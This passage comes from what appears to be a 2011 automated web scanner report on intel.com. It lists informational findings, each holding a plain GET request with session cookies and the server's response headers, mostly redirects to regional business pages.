s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "40f22c2de03acb1:4305"
Last-Modified: Fri, 13 Aug 2010 12:08:01 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:06 GMT
Content-Length: 91
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/ru_ru/business/index.htm">

23.21. http://www.intel.com/business/enterprise/emea/spa/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/spa/index.htm

Request

GET /business/enterprise/emea/spa/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "c2c6b88aaa3fcb1:4558"
Last-Modified: Thu, 19 Aug 2010 14:26:41 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:08 GMT
Content-Length: 90
Connection: close

<META HTTP-EQUIV="REFRESH" Content="0; URL=http://www.intel.com/es_es/business/index.htm">

23.22. http://www.intel.com/business/enterprise/emea/swe/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/swe/index.htm

Request

GET /business/enterprise/emea/swe/index.htm?iid=gg_sv_SE+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "603d723dd150cb1:4305"
Last-Modified: Fri, 10 Sep 2010 10:16:31 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:11 GMT
Content-Length: 93
Connection: close

<meta HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.intel.com/sv_se/business/index.htm">

23.23. http://www.intel.com/business/enterprise/emea/tur/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/tur/index.htm

Request

GET /business/enterprise/emea/tur/index.htm?iid=gg_tr_TR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "c92d52101845cb1:4305"
Last-Modified: Thu, 26 Aug 2010 12:13:16 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:12 GMT
Content-Length: 90
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/tr_Tr/business/index.htm">

23.24. http://www.intel.com/business/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/home

Request

GET /business/home HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:18:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:14 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=MKLFCODABCLJPLBODFGGNBKN; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

23.25. http://www.intel.com/business/vpro/alliance/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/vpro/alliance/index.htm

Request

GET /business/vpro/alliance/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel vPro Technology Alliance</title>

   <link rel="
...[SNIP]...

23.26. http://www.intel.com/buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /buy/

Request

GET /buy/ HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:14 GMT
Content-Length: 26099
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Buy Intel&reg; Products and Services . Intel Corporati
...[SNIP]...

23.27. http://www.intel.com/go/itp/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /go/itp/index.htm

Request

GET /go/itp/index.htm?iid=subhdr+ptr_chan_itp HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:53 GMT
Content-Length: 2016
Connection: close

<html>
<TITLE>Redirect Page</TITLE>

<!-- project start date 06/22/10 -->
<!-- Project end date 06/22/11 -->
<!-- Project Owner (Phil Seward)-->

<head>
<meta HTTP-EQUIV="Refresh" CONTENT="1;
...[SNIP]...

23.28. http://www.intel.com/intel/companyinfo/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /intel/companyinfo/index.htm

Request

GET /intel/companyinfo/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:14 GMT
Content-Length: 25926
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel's Corporate Values and Vision.</title>
   
   <met
...[SNIP]...

23.29. http://www.intel.com/intel/corpresponsibility/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /intel/corpresponsibility/index.htm

Request

GET /intel/corpresponsibility/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:08 GMT
Content-Length: 31356
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Corporate Responsibility &mdash; With Leadership
...[SNIP]...

23.30. http://www.intel.com/newsroom/assets/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /newsroom/assets/images/

Request

GET /newsroom/assets/images/ HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
